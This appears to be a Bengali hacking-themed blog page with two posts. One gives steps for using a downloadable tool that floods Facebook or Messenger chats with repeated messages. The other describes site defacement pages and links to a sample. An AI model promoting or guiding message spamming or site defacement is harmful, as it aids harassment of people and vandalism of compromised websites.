আপনার আইপি অ্যাড্রেস জানতে চাইলে www.google.com এ গিয়ে IP Address লিখে এন্টার চাপুন, আপনার নিজের আইপি উপরে বড় করে লেখা দেখবেন।

বিভাগঃ হ্যাকিং

আরও পড়ুন

আসুন এবার মেসেজে স্প্যাম করি, Easy Spamming দিয়ে!

Tawsif Torabi ৭:০৩ PM 0 Comment

Tawsif Torabi

আসুন এবার মেসেজে স্প্যাম করি, Easy Spamming দিয়ে!

আসসালামু আলাইকুম,

লিখি তো লিখি না, কিছু মনে করবেন না। এখন থেকে ঠিক করেছি প্রতিদিন একটা ব্লগ পোস্ট করবো, একাধিক নয়। সময় পেলে অবশ্যই একাধিক করবো। এসএসসি- এর প্রস্তুতি আগে থেকেই নেওয়া লাগবে। এছাড়া স্কুলের পরীক্ষার চাপে আছি।

এখন আজকে আর কিছু সিরিয়াসলি নেবো না। বন্ধুদের সাথে একটু মজাই করি, কি বলেন?

আসুন আজকে বন্ধুদের স্প্যামিং করি। না, কোনও স্ক্রিপ্ট নয়।
তবে একটা কথা বলতে হচ্ছে আপনাদের, ফেসবুকের সিকিউরিটি আরও উন্নত করা হয়েছে।
আরও উন্নত লগিন এপ্রুভালের সাথে ইন্সপেকশন টুল এবং ডেভেলপার টূল থেকে এক্সটারনাল জাভা স্ক্রিপ্ট আর চালান যাবে না।

এর মানে আমরা আর একসাথে ফ্রেন্ড ইনভাইট, ফ্রেন্ড রিকুয়েস্ট এই জাভা স্ক্রিপ্ট গুলো ব্যাবহার করতে পারব না। দুঃখের কথা :'(

এবার আমরা ডেস্কটপ দিয়ে কোনও মেসেঞ্জার বা ফেসবুকে যেকোনো বন্ধুকে স্প্যাম করতে পারবেন। তবে বলে রাখি, কোনও মেয়েকে স্প্যাম করে ডিস্টার্ব করবেন না, সেক্ষেত্রে আমি দায়ি না। কারও ক্ষতি করবেন না।

ডাউনলোড লিঙ্ক পোস্টের শেষে আছে। ডাউনলোড করে ওপেন করুন। এবার একটা ইন্টারফেস পাবেন এরকম।

এবার স্টেপগুলো মনোযোগ দিয়ে অনুসরন করুন,

Enter Your Message বক্সে যে মেসেজ স্প্যাম করবেন তা লিখুন
এবার স্টার্ট (Start) লেখা বাটনে চাপ দিন।
এবার যেই মেসেজে স্প্যাম করবেন তাতে ক্লিক করুন, মানে ধরুন ফেসবুকে যেখানে মেসেজ লিখবেন ওখানে খালি মাউস কার্সর দিয়ে ক্লিক করুন।
এবার দেখুন মজা!
বন্ধ করতে চাইলে স্টপ (Stop) বাটনে চাপ দিন।

ডাউনলোড ইজি স্প্যামিং ভার্সন ১.০ - Download Easy Spamming v1.0

বিভাগঃ ফেসবুক অ্যাপ সফটওয়্যার হ্যাকিং

আরও পড়ুন

ডিফেস পেজ কি এবং কিভাবে হ্যাক করা সাইটে ডিফেস পেজ বিল্ট করা হয়? What is Deface Page and how to make it?

Tawsif Torabi ৭:০২ PM 0 Comment

Tawsif Torabi

ডিফেস পেজ কি এবং কিভাবে হ্যাক করা সাইটে ডিফেস পেজ বিল্ট করা হয়? What is Deface Page and how to make it?

আসসালামু আলাইকুম,কেমন আছেন?

আমি কখনো হ্যাকিং করার চেস্টা করিনি, কিন্তু কয়দিন হল বেশ কিছু মেথড শিখতে শুরু করেছি ফারুক আহমেদের কল্যাণে!

তো আজ আপনাদের দেখাবো দিফেস পেজ কি এবং কিভাবে হ্যাক করা সাইটে ডিফেস পেজ বিল্ট করা হয়। এটা বানানো হয় Advace Deface Creator নামের একটা প্রোগ্রাম দিয়ে, এরকম আরও প্রোগ্রাম আছে, তবে আমার কাছে এটাই আছে।

তো, ডিফেস পেজ হল এমন একটি ওয়েবপেজ যা হ্যাকাররা নিজেদের সিগনেচার বা স্বাক্ষর করতে ব্যাবহার করে। এছাড়া এসব পেজের সোর্স পাওয়া যায় না।
হ্যাক করা ওয়েবসাইটে ঢুকলে একটা পেজ আসে, যা অনেকেই দেখেছেন, সেখানে হয়তো লেখা থাকে Hacked By 1qaz2wsx ইত্যাদি ইত্যাদি।

তো এই পেজ আপনারা নিজেই বানিয়ে নিতে পারেন, সাধারণ এইচটিএমএল আর সিএসএস দিয়েই বানাতে পারবেন। তবে চাইলে অন্য হ্যাকারদের থেকে কপি করে নিতে পারেন।

এই পোস্ট মূলত করা ডিফেস পেজের সংজ্ঞা দিতে, তবে আমি আরও তথ্য দেবো।
তো একটা দিফেজ পেজের ডেমো দেখে নিন, এই পেজটি একজন বাংলাদেশি হ্যাকারের তৈরি করা, নাম বললাম না। কোড নেম X3N4X.

ডাউনলোড
ডেমো